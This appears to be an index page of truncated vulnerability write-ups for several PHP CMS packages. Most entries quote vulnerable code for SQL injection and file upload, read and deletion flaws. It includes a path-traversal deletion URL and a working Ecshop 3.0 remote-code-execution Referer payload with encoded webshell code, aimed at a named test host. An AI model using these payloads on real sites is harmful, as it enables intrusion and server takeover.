126cms injection

126cms download address: http://down.admin5.com/php/77014.html 1. Vulnerable file: 126cms/job.php, lines 11 to 22: if( $job == 'updatehits' ){ $aid = $_GET['aid']; // fetch fid and mid $query = "SELECT * FROM `w6_module_content_index` WHERE `id`='".$aid."'"; $result = mysql_query($query); $fid = mysql_result($result,"0","fid"); $mid = mysql_result($result,"0","mid"); $query = "SELECT `aid`,`count` FROM ` ......

binzcms_v1.0 front-end arbitrary file upload and deletion && back-end time-based blind injection

binzcms_v1.0 download address: http://down.admin5.com/php/69689.html Problem file: binzcms/class/FrontHomeClass.php, lines 133-145: private function front_member_img() { $upload_path = 'upload/member'; $image_insert = $this->mod_front_upload_img($upload_path); if($image_insert) { $this->binz_common->front_msg($this->binz_tpl->var_all['home_member_edit_top_ok'],0,$link,$this->binz_tpl,true,2); } else { $this->binz_common->front_msg( ......

Luocms_v2.0.10 duplicate injection

Luocms_v2.0.10 download address: http://down.admin5.com/php/24114.html Vulnerable file: Luocms/index.php: <?php require_once "inc/const.php"; $id = getvar("id"); $fid = getvar("fid"); $cid = getvar("cid"); $act = getvar("act"); $p = getvar("p"); $p = !empty($p) ? $p : 1; $p_l = new cls_tpl(); $p_l->tpl_main($act,$id,$cid,$sitepath,$p); ?> To see how the parameters are obtained, look at the definition of getvar in the function file, lines 45-49: function getvar($var){ $ ......

qcms1.3 reinstallation vulnerability && injection vulnerability

qcms1.3 download address: http://down.admin5.com/php/1402.html 1. Vulnerable file qcms/install/index.php: 1.1 The install file is not checked at all; anyone who knows the database account and password can reinstall directly. Vulnerable file qcms/inc/hits.php, lines 3-10: <?php $nid=$_GET['id']; $ns=new news; $result=$ns->news_view($nid); $qesy=$ns->news_hits($nid); $nmyrow=mysql_fetch_array($result); echo "document.writeln('".$nmyrow['readcount']."')"; ?> Following the two functions of the qcms/news class: function news_view($id) { ......

RTCMS back-end arbitrary file read && deletion

RTCMS download address: http://down.admin5.com/php/113335.html 1. Vulnerable file: rtcms\admin\db.inc.php case 'delete': if(!$name)showmsg('请选择要删除的备份文件!'); foreach($name as $filename) { @unlink(RETENG_ROOT.'data/bakup/'.$filename); } showmsg('成功删除备份文件!','?file=db&action=import'); break; 1.1 Arbitrary file deletion in the back-end database restore/delete handler: http://localhost/admin.php?file=db&action=delete&do_submit=1&name%5B%5D=../retengcms.lock& ......

Yunyan system test

http://63053cf3af6fe0aa.yunyansec.com/ Ecshop v.3.0 remote code execution. Visit user.php and add the header Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:289:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s: ......

beescmsV3.3 - v4.0 back-end arbitrary file read + modification

Problem file: admin/admin_template.php // template editing page elseif($action=='xg'){ if(!check_purview('tpl_manage')){msg('<span style="color:red">操作失败,你的权限不足!</span>');} $file = $_GET['file']; $path=CMS_PATH.$file; if(!$fp=@fopen($path,'r+')){err('<span style="color:red">模板打开失败,请确定【'.$file.'】模板是否存在</span>');} flock($fp,LOCK_EX); $str=@fread($fp,filesize($path)); $str = str_replace("&","&amp;",$str); $str= str_replace(array("'",'"'," ......